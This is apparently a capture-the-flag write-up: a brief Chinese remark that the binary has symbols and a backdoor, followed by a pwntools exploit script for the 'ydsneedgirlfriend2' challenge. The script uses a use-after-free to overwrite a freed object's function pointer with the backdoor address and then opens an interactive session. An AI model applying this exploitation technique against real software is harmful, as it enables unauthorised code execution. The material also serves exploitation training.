有符號表,而且直接留了後門!
exp
from pwn import *
# Verbose pwntools tracing: every byte sent/received is echoed, which is what
# makes the interaction below auditable after the fact.
context.log_level = 'debug'
def debug_pause():
    """Print the target process's PID and block until the operator presses a key.

    Intended for attaching a debugger to the spawned process; `p` is the
    module-level pwntools tube created further down in the script.
    """
    pids = proc.pidof(p)
    log.info(pids)
    pause()
def add(length, name):
    """Drive menu option 1 of the target: create an entry with the given size and name.

    Args:
        length: value sent at the "length of her name" prompt (sent as text).
        name: bytes sent at the "her name" prompt. Sent with `sendafter`, so
            no newline is appended — the payload goes through exactly as given.
    """
    line_replies = (
        ('choice :', str(1)),
        ('the length of her name:', str(length)),
    )
    for prompt, reply in line_replies:
        p.sendlineafter(prompt, reply)
    # Raw send for the name: the caller controls every byte.
    p.sendafter('her name:', name)
def dele(index):
    """Drive menu option 2 of the target: delete the entry at `index`.

    Whether the target clears its table slot after freeing is what the rest
    of this script exercises; this helper only issues the menu input.
    """
    replies = (('choice :', str(2)), ('Index :', str(index)))
    for prompt, reply in replies:
        p.sendlineafter(prompt, reply)
def show(index):
    """Drive menu option 3 of the target: display the entry at `index`."""
    replies = (('choice :', str(3)), ('Index :', str(index)))
    for prompt, reply in replies:
        p.sendlineafter(prompt, reply)
proc_name = './ydsneedgirlfriend2'
# Local run by default; the remote variant from the original writeup is kept
# for reference.
p = process(proc_name)
# p = remote('node3.buuoj.cn', 25351)
elf = ELF(proc_name)
# Address of the function the writeup calls a "backdoor" (see the note at the
# top of the page). Taken from the binary's symbol table per that note.
backdoor_addr = 0x400d86

# Sequence illustrating a use-after-free in the target: index 0 is deleted,
# yet show(0) is still accepted afterwards, so the program keeps dereferencing
# a slot it has already freed. The 0x10-byte entry created in between
# presumably lands in the memory that slot still points to (confirm against
# the binary); its second qword is the backdoor address.
# Defensive fix in the target would be to null the table slot on delete and
# reject indices that are out of range or no longer live.
add(0x80, b'a')
dele(0)
fake_obj = p64(0x0) + p64(backdoor_addr)
add(0x10, fake_obj)
# debug_pause()
show(0)
p.interactive()